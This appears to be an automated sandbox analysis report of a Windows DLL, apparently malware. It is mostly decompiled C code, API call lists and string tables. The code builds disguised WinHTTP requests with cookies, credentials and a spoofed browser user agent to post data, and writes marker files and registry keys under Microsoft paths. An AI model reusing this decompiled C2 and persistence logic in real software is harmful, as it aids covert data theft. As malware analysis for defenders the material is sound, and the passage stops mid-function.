                                                                                                                                                      					__imp__WinHttpSetOption(_v44, 0x58, _t276, 4);
                                                                                                                                                      					_v96 = _t276;
                                                                                                                                                      					_t277 = _v76;
                                                                                                                                                      					__imp__WinHttpConnect(_v44, _t277, _v20, 0);
                                                                                                                                                      					_v80 = _t277;
                                                                                                                                                      					if(_v80 == 0) {
                                                                                                                                                      						goto L59;
                                                                                                                                                      					}
                                                                                                                                                      					_v116 = 0x100;
                                                                                                                                                      					if(_v24 != 0) {
                                                                                                                                                      						_v116 = _v116 | 0x00800000;
                                                                                                                                                      					}
                                                                                                                                                      					_t279 = _v80;
                                                                                                                                                      					__imp__WinHttpOpenRequest(_t279,  &_v72, _v84, L"HTTP/1.1", 0, 0, _v116); // executed
                                                                                                                                                      					_v52 = _t279;
                                                                                                                                                      					if(_v52 == 0) {
                                                                                                                                                      						goto L59;
                                                                                                                                                      					} else {
                                                                                                                                                      						if(_a8 != 0) {
                                                                                                                                                      							_t510 = _a12;
                                                                                                                                                      							if(_a12 != 0) {
                                                                                                                                                      								_v132 = E1001A370(_t357, _t468, _t469, _a8);
                                                                                                                                                      								_v136 = E1001A370(_t357, _t468, _t469, _a12);
                                                                                                                                                      								__imp__WinHttpSetCredentials(_v52, 1, 1, _v132, _v136, 0);
                                                                                                                                                      								_push(_v132);
                                                                                                                                                      								E1000CA30(_t357, _t468, _t469, _t510);
                                                                                                                                                      								_push(_v136);
                                                                                                                                                      								E1000CA30(_t357, _t468, _t469, _t510);
                                                                                                                                                      								_t473 = _t473 + 0x10;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_v120 = 4;
                                                                                                                                                      						__imp__WinHttpQueryOption(_v52, 0x1f,  &_v116,  &_v120);
                                                                                                                                                      						_v116 = _v116 | 0x00000100;
                                                                                                                                                      						_v116 = _v116 | 0x00002000;
                                                                                                                                                      						_v116 = _v116 | 0x00001000;
                                                                                                                                                      						__imp__WinHttpSetOption(_v52, 0x1f,  &_v116, 4);
                                                                                                                                                      						__imp__WinHttpAddRequestHeaders(_v52, L"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0xffffffff, 0xa0000000);
                                                                                                                                                      						__imp__WinHttpAddRequestHeaders(_v52, L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 0xffffffff, 0xa0000000);
                                                                                                                                                      						__imp__WinHttpAddRequestHeaders(_v52, L"Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", 0xffffffff, 0xa0000000);
                                                                                                                                                      						__imp__WinHttpAddRequestHeaders(_v52, L"upgrade-insecure-requests: 1", 0xffffffff, 0xa0000000);
                                                                                                                                                      						if(_a60 == 0) {
                                                                                                                                                      							L22:
                                                                                                                                                      							__eflags = _a28;
                                                                                                                                                      							if(_a28 != 0) {
                                                                                                                                                      								_v28340 = E1001A370(_t357, _t468, _t469, _a28);
                                                                                                                                                      								_v28336 = 0;
                                                                                                                                                      								E1000CF20(_t468,  &_v28334, 0, 0x6e1e);
                                                                                                                                                      								E1000E743( &_v28336,  &_v28336, 0x3710, L"Cookie: ");
                                                                                                                                                      								E1000E6C9( &_v28336, 0x3710, _v28340);
                                                                                                                                                      								__imp__WinHttpAddRequestHeaders(_v52,  &_v28336, 0xffffffff, 0xa0000000);
                                                                                                                                                      								_push(_v28340);
                                                                                                                                                      								E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      								_t473 = _t473 + 0x2c;
                                                                                                                                                      							}
                                                                                                                                                      							_v28948 = _a20;
                                                                                                                                                      							__eflags = _v28948 - 2;
                                                                                                                                                      							if(_v28948 == 2) {
                                                                                                                                                      								__imp__WinHttpAddRequestHeaders(_v52, L"Content-Type: application/x-www-form-urlencoded", 0xffffffff, 0xa0000000);
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags = _v28948 - 3;
                                                                                                                                                      								if(_v28948 == 3) {
                                                                                                                                                      									_v28864 = 0;
                                                                                                                                                      									E1000CF20(_t468,  &_v28862, 0, 0x206);
                                                                                                                                                      									_v28344 = E1001A370(_t357, _t468, _t469, _v48);
                                                                                                                                                      									wsprintfW( &_v28864, L"Content-Type: multipart/form-data; boundary=%ws", _v28344);
                                                                                                                                                      									__imp__WinHttpAddRequestHeaders(_v52,  &_v28864, 0xffffffff, 0xa0000000);
                                                                                                                                                      									_push(_v28344);
                                                                                                                                                      									E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      									_t473 = _t473 + 0x20;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							__imp__WinHttpSetTimeouts(_v52, 0xc350, 0xc350, 0xc350, 0xc350);
                                                                                                                                                      							_v128 = 0;
                                                                                                                                                      							_v124 = 0;
                                                                                                                                                      							__eflags = _a20 - 3;
                                                                                                                                                      							if(_a20 == 3) {
                                                                                                                                                      								_v124 = E10021460(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
                                                                                                                                                      								_v128 = L1000CE56(_t357, _v48, _t468, _t469, _v124);
                                                                                                                                                      								E1000CF20(_t468, _v128, 0, _v124);
                                                                                                                                                      								_t330 = E10021460(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
                                                                                                                                                      								_t473 = _t473 + 0x58;
                                                                                                                                                      								_v124 = _t330;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a20 - 3;
                                                                                                                                                      							if(_a20 != 3) {
                                                                                                                                                      								_v28952 = _a36;
                                                                                                                                                      							} else {
                                                                                                                                                      								_v28952 = _v124;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a20 - 3;
                                                                                                                                                      							if(_a20 != 3) {
                                                                                                                                                      								_v28956 = _a36;
                                                                                                                                                      							} else {
                                                                                                                                                      								_v28956 = _v124;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a20 - 3;
                                                                                                                                                      							if(_a20 != 3) {
                                                                                                                                                      								_v28960 = _a32;
                                                                                                                                                      							} else {
                                                                                                                                                      								_v28960 = _v128;
                                                                                                                                                      							}
                                                                                                                                                      							_t288 = _v52;
                                                                                                                                                      							__imp__WinHttpSendRequest(_t288, 0, 0, _v28960, _v28956, _v28952, 0); // executed
                                                                                                                                                      							_v88 = _t288;
                                                                                                                                                      							__eflags = _v88;
                                                                                                                                                      							if(_v88 == 0) {
                                                                                                                                                      								L57:
                                                                                                                                                      								__eflags = _v128;
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									_push(_v128);
                                                                                                                                                      									E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      									_t473 = _t473 + 4;
                                                                                                                                                      								}
                                                                                                                                                      								goto L59;
                                                                                                                                                      							} else {
                                                                                                                                                      								__imp__WinHttpReceiveResponse(_v52, 0);
                                                                                                                                                      								_v88 = _t288;
                                                                                                                                                      								__eflags = _v88;
                                                                                                                                                      								if(_v88 == 0) {
                                                                                                                                                      									goto L57;
                                                                                                                                                      								}
                                                                                                                                                      								_v28868 = 0;
                                                                                                                                                      								__imp__WinHttpQueryHeaders(_v52, 0x16, 0, 0,  &_v28868, 0);
                                                                                                                                                      								_t292 = GetLastError();
                                                                                                                                                      								__eflags = _t292 - 0x7a;
                                                                                                                                                      								if(_t292 == 0x7a) {
                                                                                                                                                      									_v28884 = L1000CE56(_t357,  &_v28868, _t468, _t469, _v28868 + 2);
                                                                                                                                                      									__eflags = _v28868 + 2;
                                                                                                                                                      									E1000CF20(_t468, _v28884, 0, _v28868 + 2);
                                                                                                                                                      									_t311 = _v52;
                                                                                                                                                      									__imp__WinHttpQueryHeaders(_t311, 0x16, 0, _v28884,  &_v28868, 0);
                                                                                                                                                      									_v88 = _t311;
                                                                                                                                                      									_v28880 = E1001A400(_t357, _t468, _t469, _v28884);
                                                                                                                                                      									_v28964 = E10001160( &_v28912, __eflags, _v28880);
                                                                                                                                                      									_v28968 = _v28964;
                                                                                                                                                      									_v8 = 0;
                                                                                                                                                      									E10001A70(_a64, _v28968);
                                                                                                                                                      									_v8 = 0xffffffff;
                                                                                                                                                      									E100011A0( &_v28912);
                                                                                                                                                      									_push(_v28880);
                                                                                                                                                      									E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      									_push(_v28884);
                                                                                                                                                      									_t292 = E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      									_t473 = _t473 + 0x1c;
                                                                                                                                                      								}
                                                                                                                                                      								_v28876 = 0;
                                                                                                                                                      								_v28872 = 0;
                                                                                                                                                      								__eflags = _v88;
                                                                                                                                                      								if(_v88 == 0) {
                                                                                                                                                      									L56:
                                                                                                                                                      									_v32 = _v88;
                                                                                                                                                      									goto L57;
                                                                                                                                                      								} else {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_v28868 = 0;
                                                                                                                                                      										_t437 = _v52;
                                                                                                                                                      										__imp__WinHttpQueryDataAvailable(_v52,  &_v28868); // executed
                                                                                                                                                      										__eflags = _t292;
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = _v28868;
                                                                                                                                                      										if(_v28868 != 0) {
                                                                                                                                                      											_t295 = L1000CE56(_t357, _t437, _t468, _t469, _v28868 + 1);
                                                                                                                                                      											_t479 = _t473 + 4;
                                                                                                                                                      											_v28876 = _t295;
                                                                                                                                                      											__eflags = _v28876;
                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                      												E1000CF20(_t468, _v28876, 0, _v28868 + 1);
                                                                                                                                                      												_t473 = _t479 + 0xc;
                                                                                                                                                      												_t439 = _v28876;
                                                                                                                                                      												_t298 = _v52;
                                                                                                                                                      												__imp__WinHttpReadData(_t298, _v28876, _v28868,  &_v28872);
                                                                                                                                                      												__eflags = _t298;
                                                                                                                                                      												if(__eflags == 0) {
                                                                                                                                                      													_push(GetLastError());
                                                                                                                                                      													_push("WinHttpQueryDataAvailable failed. Error = %d\n");
                                                                                                                                                      													E1000E604(_t357, _t439, _t468, _t469, __eflags);
                                                                                                                                                      													_t473 = _t473 + 8;
                                                                                                                                                      												}
                                                                                                                                                      												__eflags = _v28872;
                                                                                                                                                      												if(__eflags != 0) {
                                                                                                                                                      													_v28972 = E10001160( &_v28940, __eflags, _v28876);
                                                                                                                                                      													_v28976 = _v28972;
                                                                                                                                                      													_v8 = 1;
                                                                                                                                                      													E10001A70(_a68, _v28976);
                                                                                                                                                      													_v8 = 0xffffffff;
                                                                                                                                                      													E100011A0( &_v28940);
                                                                                                                                                      													_push(_v28876);
                                                                                                                                                      													_t292 = E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      													_t473 = _t473 + 4;
                                                                                                                                                      													__eflags = _v28868;
                                                                                                                                                      													if(_v28868 > 0) {
                                                                                                                                                      														continue;
                                                                                                                                                      													}
                                                                                                                                                      												} else {
                                                                                                                                                      												}
                                                                                                                                                      												goto L56;
                                                                                                                                                      											}
                                                                                                                                                      											_push("Out of memory.\n");
                                                                                                                                                      											E1000E604(_t357, _t437, _t468, _t469, __eflags);
                                                                                                                                                      											_t473 = _t479 + 4;
                                                                                                                                                      											goto L56;
                                                                                                                                                      										}
                                                                                                                                                      										goto L56;
                                                                                                                                                      									}
                                                                                                                                                      									_push(GetLastError());
                                                                                                                                                      									_push("WinHttpQueryDataAvailable failed. Error = %d\n");
                                                                                                                                                      									E1000E604(_t357, _t437, _t468, _t469, __eflags);
                                                                                                                                                      									_t473 = _t473 + 8;
                                                                                                                                                      									goto L56;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_v140 = 0;
                                                                                                                                                      							while( *((intOrPtr*)(_a60 + _v140 * 4)) != 0) {
                                                                                                                                                      								__imp__WinHttpAddRequestHeaders(_v52,  *((intOrPtr*)(_a60 + _v140 * 4)), 0xffffffff, 0xa0000000);
                                                                                                                                                      								_v140 = _v140 + 1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L22;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}

                                                                                                                                                      0x10021c7b
                                                                                                                                                      0x10021c7b
                                                                                                                                                      0x10021c83
                                                                                                                                                      0x10021c88
                                                                                                                                                      0x10021c8d
                                                                                                                                                      0x10021c97
                                                                                                                                                      0x10021c9d
                                                                                                                                                      0x10021ca7
                                                                                                                                                      0x10021caf
                                                                                                                                                      0x10021cb5
                                                                                                                                                      0x10021cbc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10021cc2
                                                                                                                                                      0x10021ccd
                                                                                                                                                      0x10021cd8
                                                                                                                                                      0x10021cd8
                                                                                                                                                      0x10021cf0
                                                                                                                                                      0x10021cf4
                                                                                                                                                      0x10021cfa
                                                                                                                                                      0x10021d01
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10021d07
                                                                                                                                                      0x10021d0b
                                                                                                                                                      0x10021d0d
                                                                                                                                                      0x10021d11
                                                                                                                                                      0x10021d1f
                                                                                                                                                      0x10021d2e
                                                                                                                                                      0x10021d49
                                                                                                                                                      0x10021d52
                                                                                                                                                      0x10021d53
                                                                                                                                                      0x10021d61
                                                                                                                                                      0x10021d62
                                                                                                                                                      0x10021d67
                                                                                                                                                      0x10021d67
                                                                                                                                                      0x10021d11
                                                                                                                                                      0x10021d6a
                                                                                                                                                      0x10021d7f
                                                                                                                                                      0x10021d8e
                                                                                                                                                      0x10021d99
                                                                                                                                                      0x10021da5
                                                                                                                                                      0x10021db4
                                                                                                                                                      0x10021dca
                                                                                                                                                      0x10021de0
                                                                                                                                                      0x10021df6
                                                                                                                                                      0x10021e0c
                                                                                                                                                      0x10021e16
                                                                                                                                                      0x10021e62
                                                                                                                                                      0x10021e62
                                                                                                                                                      0x10021e66
                                                                                                                                                      0x10021e78
                                                                                                                                                      0x10021e7e
                                                                                                                                                      0x10021e95
                                                                                                                                                      0x10021eae
                                                                                                                                                      0x10021ec9
                                                                                                                                                      0x10021ee3
                                                                                                                                                      0x10021eef
                                                                                                                                                      0x10021ef0
                                                                                                                                                      0x10021ef5
                                                                                                                                                      0x10021ef5
                                                                                                                                                      0x10021efb
                                                                                                                                                      0x10021f01
                                                                                                                                                      0x10021f08
                                                                                                                                                      0x10021f28
                                                                                                                                                      0x10021f0a
                                                                                                                                                      0x10021f0a
                                                                                                                                                      0x10021f11
                                                                                                                                                      0x10021f30
                                                                                                                                                      0x10021f47
                                                                                                                                                      0x10021f5b
                                                                                                                                                      0x10021f74
                                                                                                                                                      0x10021f8f
                                                                                                                                                      0x10021f9b
                                                                                                                                                      0x10021f9c
                                                                                                                                                      0x10021fa1
                                                                                                                                                      0x10021fa1
                                                                                                                                                      0x10021f11
                                                                                                                                                      0x10021fbc
                                                                                                                                                      0x10021fc2
                                                                                                                                                      0x10021fc9
                                                                                                                                                      0x10021fd0
                                                                                                                                                      0x10021fd4
                                                                                                                                                      0x10022002
                                                                                                                                                      0x10022011
                                                                                                                                                      0x1002201e
                                                                                                                                                      0x1002204a
                                                                                                                                                      0x1002204f
                                                                                                                                                      0x10022052
                                                                                                                                                      0x10022052
                                                                                                                                                      0x10022055
                                                                                                                                                      0x10022059
                                                                                                                                                      0x10022069
                                                                                                                                                      0x1002205b
                                                                                                                                                      0x1002205e
                                                                                                                                                      0x1002205e
                                                                                                                                                      0x1002206f
                                                                                                                                                      0x10022073
                                                                                                                                                      0x10022083
                                                                                                                                                      0x10022075
                                                                                                                                                      0x10022078
                                                                                                                                                      0x10022078
                                                                                                                                                      0x10022089
                                                                                                                                                      0x1002208d
                                                                                                                                                      0x1002209d
                                                                                                                                                      0x1002208f
                                                                                                                                                      0x10022092
                                                                                                                                                      0x10022092
                                                                                                                                                      0x100220be
                                                                                                                                                      0x100220c2
                                                                                                                                                      0x100220c8
                                                                                                                                                      0x100220cb
                                                                                                                                                      0x100220cf
                                                                                                                                                      0x10022355
                                                                                                                                                      0x10022355
                                                                                                                                                      0x10022359
                                                                                                                                                      0x1002235e
                                                                                                                                                      0x1002235f
                                                                                                                                                      0x10022364
                                                                                                                                                      0x10022364
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100220d5
                                                                                                                                                      0x100220db
                                                                                                                                                      0x100220e1
                                                                                                                                                      0x100220e4
                                                                                                                                                      0x100220e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100220ee
                                                                                                                                                      0x1002210b
                                                                                                                                                      0x10022111
                                                                                                                                                      0x10022117
                                                                                                                                                      0x1002211a
                                                                                                                                                      0x10022132
                                                                                                                                                      0x1002213e
                                                                                                                                                      0x1002214b
                                                                                                                                                      0x10022167
                                                                                                                                                      0x1002216b
                                                                                                                                                      0x10022171
                                                                                                                                                      0x10022183
                                                                                                                                                      0x1002219b
                                                                                                                                                      0x100221a7
                                                                                                                                                      0x100221ad
                                                                                                                                                      0x100221be
                                                                                                                                                      0x100221c3
                                                                                                                                                      0x100221d0
                                                                                                                                                      0x100221db
                                                                                                                                                      0x100221dc
                                                                                                                                                      0x100221ea
                                                                                                                                                      0x100221eb
                                                                                                                                                      0x100221f0
                                                                                                                                                      0x100221f0
                                                                                                                                                      0x100221f3
                                                                                                                                                      0x100221fd
                                                                                                                                                      0x10022207
                                                                                                                                                      0x1002220b
                                                                                                                                                      0x1002234f
                                                                                                                                                      0x10022352
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10022211
                                                                                                                                                      0x10022211
                                                                                                                                                      0x10022211
                                                                                                                                                      0x10022222
                                                                                                                                                      0x10022226
                                                                                                                                                      0x1002222c
                                                                                                                                                      0x1002222e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10022249
                                                                                                                                                      0x10022250
                                                                                                                                                      0x10022261
                                                                                                                                                      0x10022266
                                                                                                                                                      0x10022269
                                                                                                                                                      0x1002226f

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 100211B0: _memset.LIBCMT ref: 100212CB
                                                                                                                                                        • Part of subcall function 100211B0: _strlen.LIBCMT ref: 1002130A
                                                                                                                                                        • Part of subcall function 1001A370: _strlen.LIBCMT ref: 1001A381
                                                                                                                                                        • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                        • Part of subcall function 1001A370: _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                        • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                      • _wcscpy_s.LIBCMT ref: 10021BDE
                                                                                                                                                      • _wcscpy_s.LIBCMT ref: 10021BF3
                                                                                                                                                      • WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                      • WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                      • WinHttpSetOption.WINHTTP(00000000,00000058,?,00000004), ref: 10021C97
                                                                                                                                                      • WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 10021CAF
                                                                                                                                                      • WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 10021CF4
                                                                                                                                                      • WinHttpSetCredentials.WINHTTP(00000000,00000001,00000001,?,?,00000000), ref: 10021D49
                                                                                                                                                      • WinHttpQueryOption.WINHTTP(00000000,0000001F,00000100,?), ref: 10021D7F
                                                                                                                                                      • WinHttpSetOption.WINHTTP(00000000,0000001F,00000100,00000004), ref: 10021DB4
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,000000FF,A0000000), ref: 10021DCA
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,000000FF,A0000000), ref: 10021DE0
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,000000FF,A0000000), ref: 10021DF6
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,upgrade-insecure-requests: 1,000000FF,A0000000), ref: 10021E0C
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 10021E5A
                                                                                                                                                      • _memset.LIBCMT ref: 10021E95
                                                                                                                                                      • _wcscpy_s.LIBCMT ref: 10021EAE
                                                                                                                                                      • _wcscat_s.LIBCMT ref: 10021EC9
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,?,000000FF,A0000000), ref: 10021EE3
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 10021F28
                                                                                                                                                        • Part of subcall function 10021460: _memset.LIBCMT ref: 100214F6
                                                                                                                                                        • Part of subcall function 10021460: _memset.LIBCMT ref: 10021513
                                                                                                                                                        • Part of subcall function 10021460: _memset.LIBCMT ref: 10021530
                                                                                                                                                        • Part of subcall function 10021460: _sprintf.LIBCMT ref: 10021552
                                                                                                                                                        • Part of subcall function 10021460: _sprintf.LIBCMT ref: 1002156C
                                                                                                                                                        • Part of subcall function 10021460: _sprintf.LIBCMT ref: 10021598
                                                                                                                                                        • Part of subcall function 10021460: _strlen.LIBCMT ref: 100215AF
                                                                                                                                                        • Part of subcall function 10021460: _strlen.LIBCMT ref: 100215D7
                                                                                                                                                      • WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 10021FBC
                                                                                                                                                      • _memset.LIBCMT ref: 1002201E
                                                                                                                                                      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000), ref: 100220C2
                                                                                                                                                      • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 100220DB
                                                                                                                                                      • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000), ref: 1002210B
                                                                                                                                                      • GetLastError.KERNEL32 ref: 10022111
                                                                                                                                                      • _memset.LIBCMT ref: 1002214B
                                                                                                                                                      • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,?,?,00000000), ref: 1002216B
                                                                                                                                                      • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 10022226
                                                                                                                                                      • GetLastError.KERNEL32 ref: 10022230
                                                                                                                                                      • _printf.LIBCMT ref: 1002223C
                                                                                                                                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022371
                                                                                                                                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022381
                                                                                                                                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022391
                                                                                                                                                      Strings
                                                                                                                                                      • Out of memory., xrefs: 10022278
                                                                                                                                                      • GET, xrefs: 10021BD3
                                                                                                                                                      • P, xrefs: 10021B2E
                                                                                                                                                      • upgrade-insecure-requests: 1, xrefs: 10021E03
                                                                                                                                                      • A WinHTTP Example Program/1.0, xrefs: 10021C1F
                                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 10021F1F
                                                                                                                                                      • Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7, xrefs: 10021DED
                                                                                                                                                      • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 10022237
                                                                                                                                                      • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 10021DC1
                                                                                                                                                      • HTTP/1.1, xrefs: 10021CE3
                                                                                                                                                      • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, xrefs: 10021DD7
                                                                                                                                                      • Cookie: , xrefs: 10021E9D
                                                                                                                                                      • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 100222CF
                                                                                                                                                      • POST, xrefs: 10021BE8
                                                                                                                                                      • Content-Type: multipart/form-data; boundary=%ws, xrefs: 10021F68
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Http$HeadersRequest$_memset$OptionQuery_strlen$CloseHandle_sprintf_wcscpy_s$ByteCharErrorLastMultiOpenWide$AvailableConnectCredentialsDataReceiveResponseSendTimeouts_printf_wcscat_s
                                                                                                                                                      • String ID: A WinHTTP Example Program/1.0$Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=%ws$Cookie: $GET$HTTP/1.1$Out of memory.$P$POST$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d$WinHttpQueryDataAvailable failed. Error = %d$upgrade-insecure-requests: 1
                                                                                                                                                      • API String ID: 2394362766-3430901228
                                                                                                                                                      • Opcode ID: b8ee3584adcfd30ec297091367d7441899c7aa05c1a39fbd4c09932605cfc880
                                                                                                                                                      • Instruction ID: 00e1b7ec85819600eadfa1f4c4e1cc9d1ca762337438c411615f13f897333fae
                                                                                                                                                      • Opcode Fuzzy Hash: b8ee3584adcfd30ec297091367d7441899c7aa05c1a39fbd4c09932605cfc880
                                                                                                                                                      • Instruction Fuzzy Hash: 0D4238B5D00218EBEB10CFA4DC85BEEB7B5FB48304F508258F609A7281D779AA84CF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				char _v267;
                                                                                                                                                      				char _v268;
                                                                                                                                                      				char _v531;
                                                                                                                                                      				char _v532;
                                                                                                                                                      				char _v536;
                                                                                                                                                      				char _v803;
                                                                                                                                                      				char _v804;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				void* _t54;
                                                                                                                                                      				void* _t55;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      
                                                                                                                                                      				_t94 = __eflags;
                                                                                                                                                      				_t77 = __edi;
                                                                                                                                                      				_v536 = 0;
                                                                                                                                                      				_v532 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v531, 0, 0x103);
                                                                                                                                                      				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0); // executed
                                                                                                                                                      				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
                                                                                                                                                      				_v804 = 0;
                                                                                                                                                      				E1000CF20(_t77,  &_v803, 0, 0x103);
                                                                                                                                                      				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
                                                                                                                                                      				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
                                                                                                                                                      				_v268 = 0;
                                                                                                                                                      				E1000CF20(_t77,  &_v267, 0, 0x103);
                                                                                                                                                      				E1001F990(__ebx, _t77, __esi, _t94,  &_v268); // executed
                                                                                                                                                      				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8); // executed
                                                                                                                                                      				_t95 = _t44;
                                                                                                                                                      				if(_t44 != 0) {
                                                                                                                                                      					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8); // executed
                                                                                                                                                      					_t96 = _t46;
                                                                                                                                                      					if(_t46 != 0) {
                                                                                                                                                      						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8); // executed
                                                                                                                                                      						_t97 = _t48;
                                                                                                                                                      						if(_t48 != 0) {
                                                                                                                                                      							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8); // executed
                                                                                                                                                      							_t98 = _t50;
                                                                                                                                                      							if(_t50 != 0) {
                                                                                                                                                      								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8); // executed
                                                                                                                                                      								_t99 = _t52;
                                                                                                                                                      								if(_t52 != 0) {
                                                                                                                                                      									_t54 = E1001F5F0(_a4, _t99,  &_v804, _a4, _a8); // executed
